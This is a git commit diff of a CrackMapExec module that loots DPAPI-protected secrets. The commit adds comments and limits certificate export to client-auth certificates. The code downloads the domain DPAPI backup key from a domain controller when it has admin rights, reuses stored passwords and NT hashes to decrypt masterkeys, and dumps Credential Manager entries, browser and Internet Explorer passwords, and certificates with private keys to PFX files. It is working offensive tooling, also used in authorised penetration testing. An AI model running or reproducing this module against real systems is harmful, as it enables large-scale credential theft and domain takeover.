add comments and limit cert dump to clientauth cert
parent
a25dad9705
commit
66cd0799ab
|
@ -19,23 +19,23 @@ class CMEModule:
|
||||||
|
|
||||||
def options(self, context, module_options):
|
def options(self, context, module_options):
|
||||||
"""
|
"""
|
||||||
PVK Domain backup key file
|
PVK Domain Backupkey file
|
||||||
MKFILE File with masterkeys in form of {GUID}:SHA1
|
MKFILE File with masterkeys in form of {GUID}:SHA1
|
||||||
DC_IP IP Address of the domain controller, will use to request domain backup key
|
DC_IP IP Address of the domain controller, will use to request Domain Backupkey
|
||||||
"""
|
"""
|
||||||
self.pvkbytes = None
|
self.pvkbytes = None
|
||||||
self.dc_ip = None
|
self.dc_ip = None
|
||||||
self.masterkeys = None
|
self.masterkeys = None
|
||||||
|
|
||||||
if "PVK" in module_options:
|
if "PVK" in module_options: # Used to give Domain Backup Key to the module in order to dump user related dpapi secrets
|
||||||
self.pvkbytes = open(module_options["PVK"], 'rb').read()
|
self.pvkbytes = open(module_options["PVK"], 'rb').read()
|
||||||
|
|
||||||
if "MKFILE" in module_options:
|
if "MKFILE" in module_options: # File with decrypted masterkeys
|
||||||
self.masterkeys = parse_masterkey_file(module_options["MKFILE"])
|
self.masterkeys = parse_masterkey_file(module_options["MKFILE"])
|
||||||
self.pvkbytes = open(module_options["MKFILE"], 'rb').read()
|
self.pvkbytes = open(module_options["MKFILE"], 'rb').read()
|
||||||
|
|
||||||
self.use_dc = False
|
self.use_dc = False
|
||||||
if "DC_IP" in module_options:
|
if "DC_IP" in module_options: # If filled, will connect to it in order to request Domain Backupkey
|
||||||
self.dc_ip = module_options["DC_IP"]
|
self.dc_ip = module_options["DC_IP"]
|
||||||
self.use_dc = True
|
self.use_dc = True
|
||||||
pass
|
pass
|
||||||
|
@ -51,8 +51,8 @@ class CMEModule:
|
||||||
lmhash = getattr(connection, "lmhash", "")
|
lmhash = getattr(connection, "lmhash", "")
|
||||||
nthash = getattr(connection, "nthash", "")
|
nthash = getattr(connection, "nthash", "")
|
||||||
|
|
||||||
if self.use_dc :
|
if self.use_dc : # If the DC ip is filled, will connect to it with used account and dump Domain Backupkey
|
||||||
dc = Target.create(
|
dc = Target.create(
|
||||||
domain=domain,
|
domain=domain,
|
||||||
username=username,
|
username=username,
|
||||||
password=password,
|
password=password,
|
||||||
|
@ -65,10 +65,10 @@ class CMEModule:
|
||||||
use_kcache=use_kcache,
|
use_kcache=use_kcache,
|
||||||
)
|
)
|
||||||
|
|
||||||
dc_conn = DPLootSMBConnection(dc)
|
dc_conn = DPLootSMBConnection(dc)
|
||||||
dc_conn.connect()
|
dc_conn.connect() # Connect to DC
|
||||||
|
|
||||||
if dc_conn.is_admin:
|
if dc_conn.is_admin: # If is DA, dump Domain Backupkey
|
||||||
context.log.info("Downloading Domain Backupkey")
|
context.log.info("Downloading Domain Backupkey")
|
||||||
backupkey_triage = BackupkeyTriage(target=dc, conn=dc_conn)
|
backupkey_triage = BackupkeyTriage(target=dc, conn=dc_conn)
|
||||||
backupkey = backupkey_triage.triage_backupkey()
|
backupkey = backupkey_triage.triage_backupkey()
|
||||||
|
@ -87,14 +87,16 @@ class CMEModule:
|
||||||
use_kcache=use_kcache,
|
use_kcache=use_kcache,
|
||||||
)
|
)
|
||||||
|
|
||||||
conn = DPLootSMBConnection(target)
|
conn = DPLootSMBConnection(target)
|
||||||
conn.connect()
|
conn.connect() # Upgrade SMB connection to the target to DPLoot specific SMB connection
|
||||||
|
|
||||||
|
# Get cleartext passwords and nthashes from CMEDB in order to use them to decrypt masterkeys
|
||||||
plaintexts = {username:password for _, _, username, password, _,_ in context.db.get_credentials(credtype="plaintext")}
|
plaintexts = {username:password for _, _, username, password, _,_ in context.db.get_credentials(credtype="plaintext")}
|
||||||
nthashes = {username:nt.split(':')[1] if ':' in nt else nt for _, _, username, nt, _,_ in context.db.get_credentials(credtype="hash")}
|
nthashes = {username:nt.split(':')[1] if ':' in nt else nt for _, _, username, nt, _,_ in context.db.get_credentials(credtype="hash")}
|
||||||
|
|
||||||
context.log.info("Gathering masterkeys")
|
context.log.info("Gathering masterkeys")
|
||||||
|
|
||||||
|
# Collect User and Machine masterkeys
|
||||||
masterkeys_triage = MasterkeysTriage(target=target, conn=conn, pvkbytes=self.pvkbytes, passwords=plaintexts, nthashes=nthashes)
|
masterkeys_triage = MasterkeysTriage(target=target, conn=conn, pvkbytes=self.pvkbytes, passwords=plaintexts, nthashes=nthashes)
|
||||||
if self.masterkeys is None:
|
if self.masterkeys is None:
|
||||||
self.masterkeys = masterkeys_triage.triage_masterkeys()
|
self.masterkeys = masterkeys_triage.triage_masterkeys()
|
||||||
|
@ -102,6 +104,7 @@ class CMEModule:
|
||||||
|
|
||||||
context.log.info("Looting secrets")
|
context.log.info("Looting secrets")
|
||||||
|
|
||||||
|
# Collect User and Machine Credentials Manager secrets
|
||||||
credentials_triage = CredentialsTriage(target=target, conn=conn, masterkeys=self.masterkeys)
|
credentials_triage = CredentialsTriage(target=target, conn=conn, masterkeys=self.masterkeys)
|
||||||
credentials = credentials_triage.triage_credentials()
|
credentials = credentials_triage.triage_credentials()
|
||||||
for credential in credentials:
|
for credential in credentials:
|
||||||
|
@ -110,29 +113,32 @@ class CMEModule:
|
||||||
for credential in system_credentials:
|
for credential in system_credentials:
|
||||||
context.log.highlight("[CREDENTIAL] %s - %s:%s" % (credential.target, credential.username, credential.password))
|
context.log.highlight("[CREDENTIAL] %s - %s:%s" % (credential.target, credential.username, credential.password))
|
||||||
|
|
||||||
|
# Collect Chrome Based Browser stored secrets
|
||||||
browser_triage = BrowserTriage(target=target, conn=conn, masterkeys=self.masterkeys)
|
browser_triage = BrowserTriage(target=target, conn=conn, masterkeys=self.masterkeys)
|
||||||
browser_credentials, _ = browser_triage.triage_browsers()
|
browser_credentials, _ = browser_triage.triage_browsers()
|
||||||
for credential in browser_credentials:
|
for credential in browser_credentials:
|
||||||
context.log.highlight("[%s] %s - %s:%s" % (credential.browser.upper(), credential.url, credential.username, credential.password))
|
context.log.highlight("[%s] %s - %s:%s" % (credential.browser.upper(), credential.url, credential.username, credential.password))
|
||||||
|
|
||||||
|
# Collect User Internet Explorer stored secrets
|
||||||
vaults_triage = VaultsTriage(target=target, conn=conn, masterkeys=self.masterkeys)
|
vaults_triage = VaultsTriage(target=target, conn=conn, masterkeys=self.masterkeys)
|
||||||
vaults = vaults_triage.triage_vaults()
|
vaults = vaults_triage.triage_vaults()
|
||||||
for vault in vaults:
|
for vault in vaults:
|
||||||
if vault.type == 'Internet Explorer':
|
if vault.type == 'Internet Explorer':
|
||||||
context.log.highlight("[Internet Explorer] %s - %s:%s" % (vault.resource, vault.username, vault.password))
|
context.log.highlight("[Internet Explorer] %s - %s:%s" % (vault.resource, vault.username, vault.password))
|
||||||
|
|
||||||
|
# Collect User and Machine certificates with private keys
|
||||||
certificates_triage = CertificatesTriage(target=target,conn=conn, masterkeys=self.masterkeys)
|
certificates_triage = CertificatesTriage(target=target,conn=conn, masterkeys=self.masterkeys)
|
||||||
certificates = certificates_triage.triage_certificates()
|
certificates = certificates_triage.triage_certificates()
|
||||||
for certificate in certificates:
|
for certificate in certificates:
|
||||||
filename = "%s_%s.pfx" % (certificate.username,certificate.filename[:16])
|
if certificate.clientauth:
|
||||||
context.log.success("Writting certificate to %s" % filename)
|
filename = "%s_%s.pfx" % (certificate.username,certificate.filename[:16])
|
||||||
with open(filename, "wb") as f:
|
context.log.success("Writting certificate to %s" % filename)
|
||||||
f.write(certificate.pfx)
|
with open(filename, "wb") as f:
|
||||||
|
f.write(certificate.pfx)
|
||||||
system_certificates = certificates_triage.triage_system_certificates()
|
system_certificates = certificates_triage.triage_system_certificates()
|
||||||
for certificate in system_certificates:
|
for certificate in system_certificates:
|
||||||
filename = "%s_%s.pfx" % (certificate.username,certificate.filename[:16])
|
if certificate.clientauth:
|
||||||
context.log.success("Writting certificate to %s" % filename)
|
filename = "%s_%s.pfx" % (certificate.username,certificate.filename[:16])
|
||||||
with open(filename, "wb") as f:
|
context.log.success("Writting certificate to %s" % filename)
|
||||||
f.write(certificate.pfx)
|
with open(filename, "wb") as f:
|
||||||
|
f.write(certificate.pfx)
|
Loading…
Reference in New Issue